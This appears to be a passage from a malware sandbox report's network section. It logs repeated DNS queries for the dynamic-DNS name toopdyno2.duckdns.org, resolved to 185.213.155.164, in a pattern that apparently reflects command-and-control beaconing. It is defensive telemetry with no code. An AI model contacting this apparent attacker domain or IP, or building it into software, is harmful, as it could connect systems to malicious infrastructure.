                          Mar 15, 2022 17:30:54.929518938 CET192.168.2.48.8.8.80x6548Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:55.081293106 CET192.168.2.48.8.8.80x3a6eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:55.517354012 CET192.168.2.48.8.8.80xf96dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:55.653202057 CET192.168.2.48.8.8.80x4ab5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:55.809298038 CET192.168.2.48.8.8.80x3fbfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:55.946569920 CET192.168.2.48.8.8.80x892aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:56.101111889 CET192.168.2.48.8.8.80x34d2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:56.232601881 CET192.168.2.48.8.8.80x1b68Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:56.381643057 CET192.168.2.48.8.8.80xb3eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:56.508697033 CET192.168.2.48.8.8.80xc0b0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:56.639018059 CET192.168.2.48.8.8.80x6863Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:56.779274940 CET192.168.2.48.8.8.80xb055Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:56.922188044 CET192.168.2.48.8.8.80xb9cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:57.066833973 CET192.168.2.48.8.8.80xd801Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:57.202012062 CET192.168.2.48.8.8.80x4038Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:57.337533951 CET192.168.2.48.8.8.80xdbd8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:57.485917091 CET192.168.2.48.8.8.80x2399Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:57.617099047 CET192.168.2.48.8.8.80x6c43Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:57.750149965 CET192.168.2.48.8.8.80x9ef1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:57.882508993 CET192.168.2.48.8.8.80x9945Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:58.039572954 CET192.168.2.48.8.8.80xdf02Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:58.170205116 CET192.168.2.48.8.8.80x5c7dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:58.314220905 CET192.168.2.48.8.8.80x50c5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:58.446656942 CET192.168.2.48.8.8.80xee4eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:58.596534014 CET192.168.2.48.8.8.80xe1ebStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:58.727325916 CET192.168.2.48.8.8.80x39c7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:58.867037058 CET192.168.2.48.8.8.80x25eaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:58.993659019 CET192.168.2.48.8.8.80x361cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:59.124813080 CET192.168.2.48.8.8.80xb151Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:59.260683060 CET192.168.2.48.8.8.80x35d2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:59.417960882 CET192.168.2.48.8.8.80x6cdStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:59.559878111 CET192.168.2.48.8.8.80xecadStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:00.078707933 CET192.168.2.48.8.8.80x9273Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:00.226485014 CET192.168.2.48.8.8.80x89fdStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:00.359226942 CET192.168.2.48.8.8.80x120dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:00.494452953 CET192.168.2.48.8.8.80xbfcaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:00.656563044 CET192.168.2.48.8.8.80xdad4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:00.796123981 CET192.168.2.48.8.8.80xaeeeStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:00.944190979 CET192.168.2.48.8.8.80xa812Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:01.105850935 CET192.168.2.48.8.8.80xa1f5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:01.252780914 CET192.168.2.48.8.8.80x80cfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:01.382761955 CET192.168.2.48.8.8.80x5fc6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:01.523021936 CET192.168.2.48.8.8.80xb907Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:01.653830051 CET192.168.2.48.8.8.80x770dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:01.796741962 CET192.168.2.48.8.8.80xe237Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:01.931435108 CET192.168.2.48.8.8.80xb793Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:02.084331989 CET192.168.2.48.8.8.80x476eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:02.228580952 CET192.168.2.48.8.8.80xeca7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:02.363390923 CET192.168.2.48.8.8.80x97edStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:02.495840073 CET192.168.2.48.8.8.80xc39bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:02.642376900 CET192.168.2.48.8.8.80x5885Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:02.776319981 CET192.168.2.48.8.8.80xceeeStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:02.933319092 CET192.168.2.48.8.8.80x5597Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:03.056750059 CET192.168.2.48.8.8.80xca12Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:03.204000950 CET192.168.2.48.8.8.80xfe25Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:03.337093115 CET192.168.2.48.8.8.80x3b48Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:03.487561941 CET192.168.2.48.8.8.80xc874Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:03.632116079 CET192.168.2.48.8.8.80xc79aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:03.776245117 CET192.168.2.48.8.8.80x379bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:03.915488005 CET192.168.2.48.8.8.80x3f3eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:04.049371004 CET192.168.2.48.8.8.80x2de9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:04.181379080 CET192.168.2.48.8.8.80xe528Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:04.314939976 CET192.168.2.48.8.8.80x6c57Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:04.464378119 CET192.168.2.48.8.8.80x258dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:04.586724043 CET192.168.2.48.8.8.80xd8b2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:04.743300915 CET192.168.2.48.8.8.80xfbb5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:04.868911028 CET192.168.2.48.8.8.80xec4cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:05.003274918 CET192.168.2.48.8.8.80x453dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:05.140477896 CET192.168.2.48.8.8.80x17c5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:05.302018881 CET192.168.2.48.8.8.80xe00aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:05.432480097 CET192.168.2.48.8.8.80x23efStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:05.590307951 CET192.168.2.48.8.8.80x9fa8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:05.727193117 CET192.168.2.48.8.8.80x7ac8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:05.876609087 CET192.168.2.48.8.8.80x4380Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:06.011995077 CET192.168.2.48.8.8.80xaec0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:06.170305967 CET192.168.2.48.8.8.80xe7dbStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:06.307691097 CET192.168.2.48.8.8.80x65a6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:06.459723949 CET192.168.2.48.8.8.80xe336Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:06.622788906 CET192.168.2.48.8.8.80x819dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:06.773586035 CET192.168.2.48.8.8.80x176eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:06.920506954 CET192.168.2.48.8.8.80x579Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:07.078668118 CET192.168.2.48.8.8.80xf0a2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:07.211981058 CET192.168.2.48.8.8.80xd873Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:07.362025023 CET192.168.2.48.8.8.80xf80eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:07.494100094 CET192.168.2.48.8.8.80xca5eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:07.645273924 CET192.168.2.48.8.8.80x149Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:07.778090000 CET192.168.2.48.8.8.80x983eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:07.921013117 CET192.168.2.48.8.8.80x61bfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:08.057723045 CET192.168.2.48.8.8.80xf3d9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:08.214864969 CET192.168.2.48.8.8.80x8c19Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:08.354901075 CET192.168.2.48.8.8.80x3c4eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:08.507189989 CET192.168.2.48.8.8.80xa824Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:08.635521889 CET192.168.2.48.8.8.80x410fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:08.786840916 CET192.168.2.48.8.8.80x343dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:08.917121887 CET192.168.2.48.8.8.80x44fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:09.069210052 CET192.168.2.48.8.8.80xb764Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:09.198765039 CET192.168.2.48.8.8.80x2c72Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:09.344814062 CET192.168.2.48.8.8.80x6f75Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:09.483006001 CET192.168.2.48.8.8.80x84b0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:09.638520956 CET192.168.2.48.8.8.80xb259Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:09.774463892 CET192.168.2.48.8.8.80x7f5eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.027264118 CET192.168.2.48.8.8.80xf41Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.196377993 CET192.168.2.48.8.8.80xc2bfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.330777884 CET192.168.2.48.8.8.80xf0dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.516364098 CET192.168.2.48.8.8.80x966cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:10.658179045 CET192.168.2.48.8.8.80x5b22Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:11.306992054 CET192.168.2.48.8.8.80x8cdfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:11.481993914 CET192.168.2.48.8.8.80xb79dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:13.855866909 CET192.168.2.48.8.8.80x15f8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:14.470480919 CET192.168.2.48.8.8.80xff23Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:14.615401983 CET192.168.2.48.8.8.80x9076Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:14.744911909 CET192.168.2.48.8.8.80x8fb9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:14.896245956 CET192.168.2.48.8.8.80x5289Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.026983023 CET192.168.2.48.8.8.80x128aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.180756092 CET192.168.2.48.8.8.80x7387Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.323101997 CET192.168.2.48.8.8.80x762cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.475526094 CET192.168.2.48.8.8.80x7f18Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.608942032 CET192.168.2.48.8.8.80xadceStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.774727106 CET192.168.2.48.8.8.80x3026Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:15.906936884 CET192.168.2.48.8.8.80xdda9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.100706100 CET192.168.2.48.8.8.80x8c49Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.229672909 CET192.168.2.48.8.8.80xf471Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.379829884 CET192.168.2.48.8.8.80xff9fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.510421991 CET192.168.2.48.8.8.80x7300Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.645801067 CET192.168.2.48.8.8.80x56aaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.779619932 CET192.168.2.48.8.8.80x9ce7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:16.923026085 CET192.168.2.48.8.8.80x89f1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.061486006 CET192.168.2.48.8.8.80x3711Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.212671041 CET192.168.2.48.8.8.80x8c08Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.337810993 CET192.168.2.48.8.8.80xed4bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.486799955 CET192.168.2.48.8.8.80x38d5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.618781090 CET192.168.2.48.8.8.80xd8f4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.770823002 CET192.168.2.48.8.8.80x9e5fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:17.903266907 CET192.168.2.48.8.8.80x6af9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.039078951 CET192.168.2.48.8.8.80x97Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.178113937 CET192.168.2.48.8.8.80x83daStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.315351009 CET192.168.2.48.8.8.80xa894Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.451560020 CET192.168.2.48.8.8.80x45ecStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.597878933 CET192.168.2.48.8.8.80xac40Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.728010893 CET192.168.2.48.8.8.80x1f0bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.863476038 CET192.168.2.48.8.8.80x185cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:18.994781017 CET192.168.2.48.8.8.80x3c31Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.159801006 CET192.168.2.48.8.8.80xd627Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.293051958 CET192.168.2.48.8.8.80x1ef3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.449517012 CET192.168.2.48.8.8.80xa0adStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.588749886 CET192.168.2.48.8.8.80xe95eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.723443031 CET192.168.2.48.8.8.80x5425Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:19.854664087 CET192.168.2.48.8.8.80x5fa2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.005142927 CET192.168.2.48.8.8.80x99fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.140417099 CET192.168.2.48.8.8.80xacdcStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.296498060 CET192.168.2.48.8.8.80xb2eaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.463917971 CET192.168.2.48.8.8.80x456bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.612943888 CET192.168.2.48.8.8.80xd947Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.744800091 CET192.168.2.48.8.8.80x7df7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:20.878829002 CET192.168.2.48.8.8.80xe0f0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.009624958 CET192.168.2.48.8.8.80x510bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.142291069 CET192.168.2.48.8.8.80x4ec1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.277354956 CET192.168.2.48.8.8.80xfb67Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.473665953 CET192.168.2.48.8.8.80x22d7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.603286028 CET192.168.2.48.8.8.80x26Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.743912935 CET192.168.2.48.8.8.80xcf5eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:21.886195898 CET192.168.2.48.8.8.80x450eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.039921999 CET192.168.2.48.8.8.80xdfe8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.197942019 CET192.168.2.48.8.8.80x36f0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.332823038 CET192.168.2.48.8.8.80xd46bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.464502096 CET192.168.2.48.8.8.80x445eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.617088079 CET192.168.2.48.8.8.80x6d5bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.756078959 CET192.168.2.48.8.8.80xa2b7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:22.895536900 CET192.168.2.48.8.8.80x4737Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.030410051 CET192.168.2.48.8.8.80x8d02Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.177103996 CET192.168.2.48.8.8.80xf774Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.308147907 CET192.168.2.48.8.8.80x1eaaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.442665100 CET192.168.2.48.8.8.80xfc55Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.574049950 CET192.168.2.48.8.8.80x57e1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.713648081 CET192.168.2.48.8.8.80xe99cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.855782032 CET192.168.2.48.8.8.80xb8b4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:23.994050026 CET192.168.2.48.8.8.80xa0d6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.545664072 CET192.168.2.48.8.8.80x85ceStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.681646109 CET192.168.2.48.8.8.80x7701Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.814217091 CET192.168.2.48.8.8.80x16cdStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:24.948925018 CET192.168.2.48.8.8.80x3472Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:31:25.083853960 CET192.168.2.48.8.8.80xbfa8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Mar 15, 2022 17:29:33.760276079 CET8.8.8.8192.168.2.40xa119No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:33.890690088 CET8.8.8.8192.168.2.40x95c3No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.146040916 CET8.8.8.8192.168.2.40xb26No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.326905012 CET8.8.8.8192.168.2.40x77b3No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.549693108 CET8.8.8.8192.168.2.40x3600No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.706393003 CET8.8.8.8192.168.2.40x2dcaNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.921637058 CET8.8.8.8192.168.2.40xbdb5No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:35.357336044 CET8.8.8.8192.168.2.40x18afNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:35.634143114 CET8.8.8.8192.168.2.40xd951No error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:35.881172895 CET8.8.8.8192.168.2.40x3f3dNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:36.025619984 CET8.8.8.8192.168.2.40xe7fcNo error (0)toopdyno2.duckdns.org185.213.155.164A (IP address)IN (0x0001)
